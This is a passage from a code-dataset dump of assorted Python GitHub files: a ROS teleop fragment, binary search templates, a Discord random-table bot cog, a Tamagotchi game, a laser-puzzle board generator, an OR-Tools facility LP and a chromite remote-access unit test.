self.order.data = [self.vel_y,self.w]\n self.pub1.publish(self.order)\n\nsettings = termios.tcgetattr(sys.stdin)\n\ndef getKey(self,key_timeout):\n tty.setraw(sys.stdin.fileno())\n rlist, _, _ = select.select([sys.stdin], [], [], key_timeout)\n if rlist:\n key = sys.stdin.read(1)\n else:\n key = ''\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n return key\n\nmoveBindings = {\n 's':(-0.1,0.0),\n 'S':(-0.1,0.0),\n 'w':(0.1,0.0),\n 'W':(0.1,0.0),\n 'a':(0.0,-0.3),\n 'A':(0.0,-0.3),\n 'd':(0.0,0.3),\n 'D':(0.0,0.3),\n ' ':(0.0,0.0),\n 'q':(0.0,0.0),\n 'Q':(0.0,0.0)\n }","repo_name":"johanhiguera/Rover","sub_path":"scripts/class_lecture_key.py","file_name":"class_lecture_key.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71960354387","text":"## Template for binary search\n\nfrom typing import List\n\nclass Solution:\n ## case 1: basic case ---> find target\n def search(self, nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n \n while(left <= right):\n mid = left + (right -left) // 2 ## avoid int overflowing\n if (nums[mid] == target):\n return mid\n elif (nums[mid] > target):\n 
right = mid - 1\n elif (nums[mid] < target):\n left = mid + 1\n\n return -1\n \n ## Case 2: find target and find its lower bound\n def left_bound(nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n\n while(left <= right):\n mid = left + (right-left) // 2\n if nums[mid] == target:\n right = mid -1\n elif nums[mid] > target:\n right = mid - 1\n elif nums[mid] < target:\n left = mid + 1\n if left == len(nums):\n return -1\n return left if nums[left] == target else -1\n\n ## Case 3: find target and find its higher bound\n def right_bound(nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n\n while(left <= right):\n mid = left + (right-left) // 2\n if nums[mid] == target:\n left = mid + 1\n elif nums[mid] > target:\n right = mid - 1\n elif nums[mid] < target:\n left = mid + 1\n if left - 1 < 0:\n return -1\n return left-1 if nums[left-1] == target else -1","repo_name":"xinghao302001/LeetCodeFun","sub_path":"Binary Search/LC704.py","file_name":"LC704.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4991858306","text":"def square(side):\n perimeter = side * 4\n square = side * side\n diagonal = (side**2 + side**2)**0.5\n return(perimeter, square, diagonal)\n\n\nwhile True:\n try:\n side = int(input())\n print(square(side))\n except ValueError:\n print(\"Error. Please enter an integer\")\n","repo_name":"Juxsiy/Python-nuggets","sub_path":"square_side.py","file_name":"square_side.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41933760264","text":"import discord\nimport traceback\n\nfrom .lt_logger import lt_logger\nfrom discord.ext import commands\nfrom random import randint\n\n\nclass rand(commands.Cog):\n def __init__(self, bot, lt_db, channel):\n self.bot = bot\n self.db = lt_db\n self.logger = lt_logger\n self.settings = [\"deck\", \"public\"]\n self.channel = channel\n\n # region Utility\n\n def ctx_info(self, ctx):\n Guild = ctx.message.guild.id\n ID = ctx.message.author.id\n return Guild, ID\n\n def weighted(self, pairs):\n total = sum(int(pair[1]) for pair in pairs)\n r = randint(1, total)\n\n for (value, weight) in pairs:\n r -= int(weight)\n if r <= 0:\n return value\n\n # endregion\n\n # region Random Tables\n\n @commands.group(case_insensitive=True, aliases=[\"rand\"])\n async def random(self, ctx):\n \"\"\"\n The Random command group surrounds the use of custom random tables which can be \"rolled\" on to give a random output. These tables can be weighted, or you can leave the \"weight\" argument at 1 for all entries for an unweighted table. Subcommands can only be used by the original creator of a table.\n\n If you're wishing to roll on a random table, use this command followed by the table name, i.e. 
`.random Table2`\n \"\"\"\n if ctx.invoked_subcommand is None:\n Table = ctx.message.content.split(\" \", 1)[1]\n try:\n await self.get(ctx, Table)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n\n @random.command(case_insensitive=True)\n async def multi(self, ctx, Table, num: int):\n \"\"\"\n Run multiple .random commands on the provided table.\n \"\"\"\n for x in range(0, num):\n try:\n await self.get(ctx, Table)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n\n @random.command(case_insensitive=True)\n async def list(self, ctx, scope=None):\n \"\"\"\n Lists all random tables that you have created.\n \"\"\"\n\n try:\n if scope != \"all\":\n tables = self.db.rand_get_owned(\n ctx.message.author.id, ctx.message.guild.id\n )\n title = f\"Random Tables owned by {ctx.message.author.display_name}\"\n else:\n tables = self.db.rand_get_all(ctx.message.guild.id)\n title = \"All Tables\"\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n\n outString = \"\"\n for table in tables:\n outString += f\"{table['table'].title()}\\n\"\n\n embed = discord.Embed(\n title=title,\n description=outString,\n color=0x00FF00,\n )\n await ctx.send(embed=embed)\n\n @random.command(case_insensitive=True)\n async def display(self, ctx, Table):\n \"\"\"\n Displays a random table.\n \"\"\"\n try:\n table = self.db.rand_get(ctx.message.guild.id, Table)\n print(table)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n outString = \"```\"\n for value in table[\"pairs\"]:\n outString += f\"{value[1]} - {value[0]}\\n\"\n outString += \"```\"\n\n embed = discord.Embed(\n title=f\"Random Table: {table['table']}\",\n description=outString,\n color=0x00FF00,\n )\n await ctx.send(embed=embed)\n\n @random.command(case_insensitive=True)\n async def new(self, ctx, Table):\n \"\"\"\n Adds a new table to the random tables for the server it is called in. Multiple word table names - \"Wild Magic\" for instance, must be surrounded in quotation marks.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.rand_new(Guild, ID, Table)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(self, message, self.__class__.__name__, \"New Table\")\n\n @random.command(case_insensitive=True, aliases=[\"add\"])\n async def add_entry(self, ctx, Table, Weight, *, Value):\n \"\"\"\n Adds a new weighted entry to the table. The table name requires quotation marks if it is longer than two words; the value does not.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.rand_add(Guild, ID, Table, Weight, Value)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(self, message, self.__class__.__name__, \"add_entry\")\n\n @random.command(case_insensitive=True, aliases=[\"remove\"])\n async def remove_entry(self, ctx, Table, *, Value):\n \"\"\"\n Removes a weighted entry from the table. 
The table name requires quotation marks if it is longer than two words; the value does not.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n output = self.db.rand_remove(Guild, ID, Table, Value)\n await ctx.send(output)\n\n @random.command(case_insensitive=True)\n async def delete(self, ctx, Table):\n \"\"\"\n Deletes the specified table from the database. This is not reversible.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n output = self.db.rand_delete(Guild, ID, Table)\n await ctx.send(output)\n\n @random.command(case_insensitive=True, hidden=True)\n async def get(self, ctx, Table):\n\n Guild = ctx.message.guild.id\n image_ext = [\"jpg\", \"png\", \"jpeg\", \"gif\"]\n\n try:\n result = self.db.rand_get(Guild, Table)\n\n result[\"pairs\"] = [tuple(x) for x in result[\"pairs\"]]\n randout = self.weighted(result[\"pairs\"])\n\n if result[\"deckMode\"] == \"on\":\n ID = ctx.message.author.id\n mid = result[\"_id\"]\n output = self.db.deck_draw(Guild, ID, mid, randout)\n print(output)\n\n embed = discord.Embed(\n title=\"__\" + result[\"table\"].title() + \"__\",\n description=f\"{ctx.message.author.display_name} rolled on the {Table.title()} random table!\",\n color=ctx.message.author.color,\n )\n\n if randout[0:4] == \"http\" and randout.split(\".\")[-1] in image_ext:\n embed.set_image(url=randout)\n\n else:\n embed.add_field(name=\"Random Result\", value=randout)\n await ctx.send(embed=embed)\n\n except:\n await ctx.send(\n f'It looks like the \"{Table}\" doesn\\'t exist yet, or your spelling is incorrect.'\n )\n raise Exception()\n\n @random.command()\n async def toggle(self, ctx, Table, Setting):\n \"\"\"Toggles a designated mode for the provided random table.\n\n Currently settings are Public and DeckMode\"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.toggle(Guild, ID, Table, Setting)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Random Table Toggle\"\n )\n\n @random.command(aliases=[\"reset\"])\n async def shuffle(self, ctx, Table):\n \"\"\"\n Shuffle entries back into the deck in deckmode.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.deck_shuffle(Guild, ID, Table)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Deck Shuffle\"\n )\n\n @random.command(aliases=[\"return\"])\n async def return_one(self, ctx, Table, Value):\n \"\"\"\n Return one entry to the deck in deckmode. 
WIP\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n pass\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Return One\"\n )\n\n\n# endregion\n\n\ndef setup(bot):\n bot.add_cog(rand(bot))\n","repo_name":"CaydenCailean/littlethunder","sub_path":"cogs/rand.py","file_name":"rand.py","file_ext":"py","file_size_in_byte":8719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"10483114162","text":"import datetime\nimport random\nimport time\nnow = datetime.datetime.now()\n\nclass Tamagotchi: # yikes o\n\n def __init__(self, name):\n self.sleepTimer = 100\n self.sickTimer = 5\n self.age = 0\n self.name = name\n self.condition = {\"food\": 100, \"happy\": 100, \"energy\": 100, \"health\": 100, \"discipline\": 0}\n self.isDead = False\n self.isSick = False\n self.isAsleep = False\n self.pooDroppings = 0\n self.expression = \"O\"\n self.drawing = \"O\"\n self.deathNote = \"\"\n\n def __str__(self):\n returnString = \"\"\n returnString += \"food meter: \" + str(self.condition[\"food\"]) + '\\n'\n returnString += \"happy meter: \" + str(self.condition[\"happy\"]) + '\\n'\n returnString += \"energy meter: \" + str(self.condition[\"energy\"]) + '\\n'\n returnString += \"health meter: \" + str(self.condition[\"health\"]) + '\\n'\n returnString += self.drawing\n if self.isSick == True:\n returnString += '\\nYour tamagotchi is sick...'\n return returnString\n\n def capValues(self):\n if self.condition[\"food\"] > 100:\n self.condition[\"food\"] = 100\n if self.condition[\"happy\"] > 100:\n self.condition[\"happy\"] = 100\n if self.condition[\"energy\"] > 100:\n self.condition[\"energy\"] = 100\n if self.condition[\"health\"] > 100:\n self.condition[\"health\"] = 100\n if self.condition[\"discipline\"] < 0:\n self.condition[\"discipline\"] = 0\n if self.pooDroppings<-1:\n self.pooDroppings = 0\n\n def feedTamagotchi(self):\n if self.isAsleep == False:\n ranNum = random.randint(0, self.condition[\"discipline\"])\n if ranNum == 0:\n return \"Your tamagotchi refused to eat!\"\n self.condition[\"food\"]+=8\n if self.condition[\"food\"] > 100:\n self.condition[\"health\"]-=20\n self.capValues()\n\n def scoldTamagotchi(self):\n if self.isAsleep == False:\n ranNum = random.randint(0, 10)\n if ranNum == 0:\n self.condition[\"happy\"]-=30\n self.condition[\"health\"]-=20\n return \"You scarred your tamagotchi...\"\n self.condition[\"discipline\"]+=1\n\n def playTamagotchi(self):\n if self.isAsleep == False:\n self.condition[\"energy\"]-=10\n if self.condition[\"energy\"]<0:\n self.isDead = True\n ranNum = random.randint(0, 5)\n if ranNum == 0:\n self.condition[\"discipline\"]-=2\n self.pooDroppings+=1\n self.condition[\"happy\"]+=20\n self.capValues()\n return \"Your tamagotchi had fun! 
A little too much fun...\"\n self.condition[\"happy\"]+=10\n self.capValues()\n\n def cleanTamagotchi(self):\n self.pooDroppings-=1\n\n def sleepTamagotchi(self):\n if self.condition[\"discipline\"]<3:\n return \"You're tamagotchi refused to sleep.\"\n self.isAsleep = True\n self.sleepTimer = 10\n self.drawing = \"zzz\"\n\n def stepTamagotchi(self): # runs every 5 seconds\n self.capValues()\n if self.isAsleep == True:\n self.condition[\"energy\"]+=2\n self.sleepTimer-=1\n if self.sleepTimer == 0:\n self.isAsleep = False\n self.capValues()\n if self.isAsleep == False:\n self.age+=1\n maybePoo = random.randint(0,5)\n if maybePoo == 0:\n self.pooDroppings+=1\n pooDamage = random.randint(self.pooDroppings-2, self.pooDroppings+2)\n self.condition[\"health\"]-=pooDamage*2\n self.condition[\"food\"]-=2\n if self.isSick == True:\n self.condition[\"health\"]-=5\n self.capValues()\n self.sickTimer-=1\n if self.sickTimer == 0:\n self.isSick = False\n else:\n self.condition[\"happy\"]-=1\n self.condition[\"energy\"]-=1\n healthUp = random.randint(0, (self.condition[\"happy\"] + self.condition[\"energy\"])//30)\n self.condition[\"health\"]+= healthUp\n getSick = random.randint(0, self.condition[\"energy\"] + self.condition[\"happy\"]//2)\n if getSick < 5:\n self.isSick = True\n self.sickTimer = 5\n self.capValues()\n if self.condition[\"happy\"] > 90:\n self.expression = \"> W <\"\n elif self.condition[\"happy\"] > 60:\n self.expression = \"0 u 0\"\n elif self.condition[\"happy\"] > 40:\n self.expression = \"- _ -\"\n else:\n self.expression = \"T _ T\"\n willDieSick = random.randint(0, self.condition[\"health\"]**2)\n willDieStarve = random.randint(0, self.condition[\"food\"]**2)\n if self.age > 100:\n self.isDead = True\n self.deathNote = \"Your tamagotchi passed away peacefully <3 YOU WIN!\"\n self.expression = \"X w X\"\n if self.condition[\"health\"]<20 or willDieSick == 0:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of illness.\"\n self.expression = \"X _ X\"\n if self.condition[\"happy\"]<10:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of depression.\"\n self.expression = \"X _ X\"\n if self.condition[\"energy\"]<10:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of exhaustion.\"\n self.expression = \"X _ X\"\n if self.condition[\"food\"]<20 or willDieStarve == 0:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of starvation.\"\n self.expression = \"X _ X\"\n self.drawing = self.expression\n self.drawing += \"*\"*self.pooDroppings\n self.capValues()\n time.sleep(5)\n","repo_name":"joying-yang/Web-Surfing-Without-Wifi","sub_path":"app/tamagotchi.py","file_name":"tamagotchi.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29309079081","text":"def is_symmetric(word):\n length = len(word)\n if length%2 == 0: mid = length//2\n else: mid = (length//2)+1\n start1 = 0\n start2 = mid\n\n while (start1 < mid and start2 < length):\n if word[start1] != word[start2]:\n return False\n start2+= 1\n start1+=1\n return True\n\nword = input('Enter a word: ')\n\nprint('symmetric') if is_symmetric(word) else print('Not Symmetric')","repo_name":"CHARANREDDY-learntocode/python_practise","sub_path":"strings/symmetrical.py","file_name":"symmetrical.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18336921472","text":"from enum import 
Enum\n\nclass ITEM(Enum):\n EMPTY = 0\n WALL = 1\n BOMB = 2\n TARGET = 3\n MIRROR = 4\n SOURCE = 5\n SPLIT = 6\n SCATTER = 7\n\nclass DIR(Enum):\n TOP_LEFT = 0\n TOP = 1\n TOP_RIGHT = 2\n RIGHT = 3\n BOTTOM_RIGHT = 4\n BOTTOM = 5\n BOTTOM_LEFT = 6\n LEFT = 7\n\n\ndef getNeighboursFromNewOutsAndGetTheirInputs(current_item_index, n, new_outs):\n i = int(current_item_index / n)\n j = current_item_index % n\n\n neighbourConnectionMap = {(-1,-1): 0, (-1,0): 1, (-1,1): 2, (0,1): 3, (1,1): 4, (1,0): 5, (1,-1): 6, (0,-1): 7}\n\n res = []\n for ii in [-1,0,1]:\n for jj in [-1,0,1]:\n neig_i = i + ii\n neig_j = j + jj\n #first check if the neighbor is within the box\n if((neig_i < n) and (neig_i > -1) and (neig_j < n) and (neig_j > -1) and not ((neig_i == i) and (neig_j == j))): \n # check if the output corresponding to the neightbor is 1\n neighbour_dir = neighbourConnectionMap[ii, jj]\n if(new_outs[neighbour_dir]):\n input_dir_for_the_neighbour = (neighbour_dir + 4) % 8 \n res.append((neig_i * n + neig_j, input_dir_for_the_neighbour))\n return res\n\ndef getNewOutsForCurrent(item, item_dir, ins_cur, outs_cur):\n res = [0,0,0,0,0,0,0,0]\n\n if item == ITEM.BOMB:\n return res\n elif item == ITEM.EMPTY or item == ITEM.TARGET:\n ins_rotated_by_four = ins_cur[-4:]+ins_cur[:-4]\n # we are only returning new outs so, if it waas already out before then we do ot return it\n res = [1 if a1 == 1 and a2 != 1 else 0 for a1, a2 in zip(ins_rotated_by_four, outs_cur)]\n elif item == ITEM.MIRROR:\n left_dir = (item_dir - 1) % 8\n right_dir = (item_dir + 1) % 8\n\n if ins_cur[item_dir] == 1 and outs_cur[item_dir] != 1:\n res[item_dir] = 1\n\n if ins_cur[left_dir] == 1 and outs_cur[right_dir] != 1:\n res[right_dir] = 1\n\n if ins_cur[right_dir] == 1 and outs_cur[left_dir] != 1:\n res[left_dir] = 1\n elif item == ITEM.SCATTER:\n left_dir = (item_dir - 3) % 8\n right_dir = (item_dir + 3) % 8\n\n if ins_cur[item_dir] == 1:\n if outs_cur[right_dir] != 1:\n res[right_dir] = 1\n if outs_cur[left_dir] != 1:\n res[left_dir] = 1\n\n if (ins_cur[left_dir] == 1 or ins_cur[right_dir] == 1) and outs_cur[item_dir] != 1:\n res[item_dir] = 1\n elif item == ITEM.SOURCE:\n if outs_cur[item_dir] != 1:\n res[item_dir] = 1\n elif item == ITEM.SPLIT:\n left_dir = (item_dir - 2) % 8\n right_dir = (item_dir + 2) % 8\n\n if ins_cur[item_dir] == 1:\n if outs_cur[right_dir] != 1:\n res[right_dir] = 1\n if outs_cur[left_dir] != 1:\n res[left_dir] = 1\n elif item == ITEM.WALL:\n return res\n\n return res\n\ndef BoardGenerate(items, item_dirs, n):\n ins = [[0] * 8 for _ in range(n * n)]\n outs = [[0] * 8 for _ in range(n * n)]\n\n source_indices = [index for index, value in enumerate(items) if value == ITEM.SOURCE]\n\n queue = source_indices\n \n while len(queue) > 0:\n current_item_index = queue.pop(0)\n item = items[current_item_index]\n item_dir = item_dirs[current_item_index]\n ins_cur = ins[current_item_index]\n outs_cur = outs[current_item_index]\n new_outs = getNewOutsForCurrent(item, item_dir.value, ins_cur, outs_cur)\n \n neigs = getNeighboursFromNewOutsAndGetTheirInputs(current_item_index, n, new_outs)\n \n for neig in neigs:\n (neigh_index, neigh_input_dir) = neig\n if neigh_index not in queue:\n queue.append(neigh_index)\n\n #update ins for the new outs coming from current_item\n ins[neigh_index][neigh_input_dir] = 1\n\n # update outs for the current_index with new_outs\n updated_cur_out = [1 if a1 == 1 or a2 == 1 else 0 for a1, a2 in zip(new_outs, outs_cur)]\n outs[current_item_index] = updated_cur_out\n\n return ins, outs\n\ndef 
main():\n n = 3\n #items = [ITEM.EMPTY] * n * n\n #item_dirs = [DIR.TOP] * n * n\n \n #items = [ITEM.EMPTY, ITEM.MIRROR, ITEM.MIRROR, ITEM.EMPTY, ITEM.SOURCE, ITEM.EMPTY, ITEM.BOMB, ITEM.WALL, ITEM.TARGET]\n #item_dirs = [DIR.TOP,DIR.BOTTOM_RIGHT, DIR.BOTTOM_LEFT, DIR.BOTTOM_LEFT,DIR.TOP, DIR.TOP, DIR.TOP, DIR.TOP, DIR.TOP]\n \n items = [ITEM.SOURCE, ITEM.SOURCE, ITEM.TARGET, ITEM.BOMB, ITEM.SPLIT, ITEM.MIRROR, ITEM.WALL, ITEM.TARGET, ITEM.EMPTY]\n item_dirs = [DIR.BOTTOM_RIGHT,DIR.BOTTOM_RIGHT, DIR.BOTTOM_LEFT, DIR.BOTTOM_LEFT,DIR.TOP_LEFT, DIR.LEFT, DIR.TOP, DIR.TOP, DIR.TOP]\n \n #items[94] = ITEM.SOURCE\n ins, outs = BoardGenerate(items, item_dirs, n)\n\n #for inx in ins:\n # print(inx)\n #print(\"---------------------------------\")\n #for outx in outs:\n # print(outx)\n\n\nmain()","repo_name":"erhant/zkAargon","sub_path":"misc/board_generator.py","file_name":"board_generator.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"43787210465","text":"import math\r\nimport numpy as np\r\nfrom ortools.linear_solver import pywraplp\r\nfrom ortools.linear_solver.pywraplp import Constraint, Variable, Objective\r\nfrom FullyMobile.utils import calculate_dist\r\nimport time\r\n\r\nclass FlowLP():\r\n def __init__(self, potential_facilities, location_directory, pid_assignment, m, k_facs, radius, solver_id: str = \"GLOP\"):\r\n\r\n self.solver = pywraplp.Solver.CreateSolver(solver_id)\r\n \r\n self.potential_facilities = potential_facilities\r\n self.location_directory = location_directory\r\n self.pid_assignment = pid_assignment\r\n self.k = k_facs\r\n self.m = m\r\n self.radius = radius\r\n self.max_timestep = max(pid_assignment.keys())\r\n\r\n self.client_balls = self.calculate_client_balls()\r\n\r\n # Partial evaluation storage\r\n self.partials = {}\r\n\r\n start_var = time.time()\r\n self.init_variables()\r\n end_var = time.time()\r\n \r\n print(end_var-start_var)\r\n \r\n start_var = time.time()\r\n self.init_constraints()\r\n end_var = time.time()\r\n \r\n print(end_var-start_var)\r\n\r\n \r\n def calculate_client_balls(self, n_jobs = 40):\r\n \r\n client_balls = {}\r\n \r\n for time in self.pid_assignment.keys():\r\n client_balls[time] = {}\r\n for pid, pid_loc in self.pid_assignment[time]:\r\n client_balls[time][pid_loc] = []\r\n \r\n for pf in self.potential_facilities:\r\n coord_1 = (self.location_directory[pf][\"latitude\"], self.location_directory[pf][\"longitude\"])\r\n coord_2 = (self.location_directory[pid_loc][\"latitude\"], self.location_directory[pid_loc][\"longitude\"])\r\n \r\n dist = calculate_dist(coord_1, coord_2)\r\n if dist<=self.radius:\r\n client_balls[time][pid_loc].append(pf)\r\n \r\n return client_balls\r\n \r\n def init_variables(self):\r\n \"\"\"Declare variables as needed\"\"\"\r\n \r\n # indicator variable for whether facility is in solution\r\n self.Y = {}\r\n \r\n # indicator variable for whether client is serviced by a facility\r\n self.X = {}\r\n \r\n # indicator variable for movement between timesteps\r\n self.Z = {}\r\n \r\n for time in self.pid_assignment.keys():\r\n self.Y[time] = {}\r\n self.X[time] = {}\r\n self.Z[time] = {}\r\n \r\n for fac in self.potential_facilities:\r\n self.Y[time][fac] = self.solver.NumVar(0, 1, f\"y_{time}{fac}\")\r\n self.X[time][fac] = {}\r\n self.Z[time][fac] = {}\r\n \r\n for pid, pid_loc in self.pid_assignment[time]:\r\n if pid_loc not in self.X[time][fac].keys():\r\n self.X[time][fac][pid_loc] = self.solver.NumVar(0, 
1, f\"x_{time}{fac}{pid_loc}\")\r\n \r\n if time!=self.max_timestep:\r\n for next_fac in self.potential_facilities:\r\n self.Z[time][fac][next_fac] = self.solver.NumVar(0, 1, f\"z_{time}{fac}{next_fac}\") \r\n\r\n def init_constraints(self):\r\n \"\"\"Initializes the constraints according to the relaxed LP formulation of MinExposed\"\"\"\r\n\r\n # budget constraint for each timestep\r\n self.budget_constraints = {}\r\n \r\n # constraint for facility and client assignment\r\n self.client_constraints = {}\r\n \r\n # constraint for movement\r\n self.leave_constraints = {}\r\n self.enter_constraints = {}\r\n\r\n for time in self.Y.keys():\r\n self.budget_constraints[time] = self.solver.Constraint(0, self.k, f\"budget_{time}\")\r\n for fac, y_var in self.Y[time].items():\r\n self.budget_constraints[time].SetCoefficient(y_var, 1)\r\n \r\n # constraint for facility assignment\r\n for pid_loc, x_var in self.X[time][fac].items():\r\n self.solver.Add(x_var <= y_var)\r\n \r\n self.client_constraints[time] = {}\r\n for pid, pid_loc in self.pid_assignment[time]:\r\n if pid_loc not in self.client_constraints[time].keys():\r\n self.client_constraints[time][pid_loc] = self.solver.Constraint(1, 1, f\"client_assignment_{time}_{pid_loc}\")\r\n \r\n for pf in self.client_balls[time][pid_loc]:\r\n self.client_constraints[time][pid_loc].SetCoefficient(self.X[time][pf][pid_loc], 1)\r\n\r\n if time != self.max_timestep:\r\n \r\n self.leave_constraints[time] = {}\r\n self.enter_constraints[time] = {}\r\n \r\n for fac, y_var in self.Y[time].items():\r\n #self.leave_constraints[fac] = self.solver.Constraint(y_var, y_var, f\"leave_constraint_{time}_{fac}\")\r\n self.leave_constraints[fac] = self.solver.Add(self.solver.Sum([z_var for z_var in self.Z[time][fac].values()]) == y_var)\r\n for next_fac, z_var in self.Z[time][fac].items():\r\n #self.leave_constraints[fac].SetCoefficient(z_var, 1)\r\n \r\n coord_1 = (self.location_directory[fac][\"latitude\"], self.location_directory[fac][\"longitude\"])\r\n coord_2 = (self.location_directory[next_fac][\"latitude\"], self.location_directory[next_fac][\"longitude\"])\r\n \r\n dist = calculate_dist(coord_1, coord_2)\r\n if dist > self.m:\r\n self.solver.Add(self.Z[time][fac][next_fac] == 0)\r\n \r\n for next_fac, y_var in self.Y[time+1].items():\r\n self.enter_constraints[next_fac] = self.solver.Add(self.solver.Sum([self.Z[time][fac][next_fac] for fac in self.Z[time].keys()]) == y_var)\r\n #self.solver.Constraint(y_var, y_var, f\"enter_constraint_{time}_{next_fac}\")\r\n #for fac in self.Z[time].keys():\r\n # self.enter_constraints[next_fac].SetCoefficient(self.Z[time][fac][next_fac], 1)\r\n\r\n def solve_lp(self):\r\n \r\n self.status = self.solver.Solve()\r\n \r\n if self.status == pywraplp.Solver.OPTIMAL:\r\n print('Problem solved in %f milliseconds' % self.solver.wall_time())\r\n print('Problem solved in %d iterations' % self.solver.iterations())\r\n else:\r\n print('The problem does not have an optimal solution.')\r\n\r\n def get_variable_solution(self):\r\n if self.status == pywraplp.Solver.OPTIMAL:\r\n y = {time: {fac: self.Y[time][fac].solution_value() for fac in self.Y[time].keys()} for time in self.Y.keys()}\r\n x = {time: {fac: {pid: self.X[time][fac][pid].solution_value() for pid in self.X[time][fac].keys()} for fac in self.X[time].keys()} for time in self.X.keys()}\r\n z = {time: {fac: {next_fac: self.Z[time][fac][next_fac].solution_value() for next_fac in self.Z[time][fac].keys()} for fac in self.Z[time].keys()} for time in self.Z.keys()}\r\n return y, x, z\r\n 
else:\r\n print(\"Not optimal\")\r\n return {}, {}, {}\r\n \r\n ","repo_name":"Ann924/FullyMobileFacilities","sub_path":"FullyMobile/lp.py","file_name":"lp.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24702653223","text":"# An ugly number is a positive integer whose prime factors are limited to 2, 3, and 5.\n# Given an integer n, return true if n is an ugly number.\nclass Solution(object):\n def isUgly(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n if n<=0:\n return False\n if n==1:\n return True\n q, r = divmod(n, 2)\n if r == 0:\n return self.isUgly(q)\n else:\n q, r = divmod(n, 3)\n if r == 0:\n return self.isUgly(q)\n else:\n q, r = divmod(n, 5)\n if r==0:\n return self.isUgly(q)\n else:\n return False\n\nn=20\nsolution=Solution()\nprint(solution.isUgly(n))","repo_name":"danqing36/leetcode","sub_path":"Hashtable/263_Ugly_Number.py","file_name":"263_Ugly_Number.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22682323340","text":"import os\nimport re\nimport sys\n\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)),\n '..', '..'))\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_build_lib_unittest\nfrom chromite.lib import cros_test_lib\nfrom chromite.lib import partial_mock\nfrom chromite.lib import remote_access\n\n# pylint: disable=W0212\n\n\nclass RemoteShMock(partial_mock.PartialCmdMock):\n\n TARGET = 'chromite.lib.remote_access.RemoteAccess'\n ATTRS = ('RemoteSh',)\n DEFAULT_ATTR = 'RemoteSh'\n\n def RemoteSh(self, inst, cmd, *args, **kwargs):\n \"\"\"Simulates a RemoteSh invocation.\"\"\"\n result = self._results['RemoteSh'].LookupResult(\n (cmd,), hook_args=(inst, cmd,) + args, hook_kwargs=kwargs)\n\n # Run the real RemoteSh with RunCommand mocked out.\n rc_mock = cros_build_lib_unittest.RunCommandMock()\n rc_mock.AddCmdResult(\n partial_mock.Ignore(), result.returncode, result.output,\n result.error)\n\n with rc_mock:\n return self.backup['RemoteSh'](inst, cmd, *args, **kwargs)\n\n\nclass RemoteAccessTest(cros_test_lib.MockTempDirTestCase):\n\n def setUp(self):\n self.rsh_mock = self.StartPatcher(RemoteShMock())\n self.host = remote_access.RemoteAccess('foon', self.tempdir)\n\n\nclass RemoteShTest(RemoteAccessTest):\n\n TEST_CMD = 'ls'\n RETURN_CODE = 0\n OUTPUT = 'witty'\n ERROR = 'error'\n\n def assertRemoteShRaises(self, **kwargs):\n self.assertRaises(cros_build_lib.RunCommandError, self.host.RemoteSh,\n self.TEST_CMD, **kwargs)\n\n def SetRemoteShResult(self, returncode=RETURN_CODE, output=OUTPUT,\n error=ERROR):\n self.rsh_mock.AddCmdResult(self.TEST_CMD, returncode=returncode,\n output=output, error=error)\n\n def testNormal(self):\n \"\"\"Test normal functionality.\"\"\"\n self.SetRemoteShResult()\n result = self.host.RemoteSh(self.TEST_CMD)\n self.assertEquals(result.returncode, self.RETURN_CODE)\n self.assertEquals(result.output.strip(), self.OUTPUT)\n self.assertEquals(result.error.strip(), 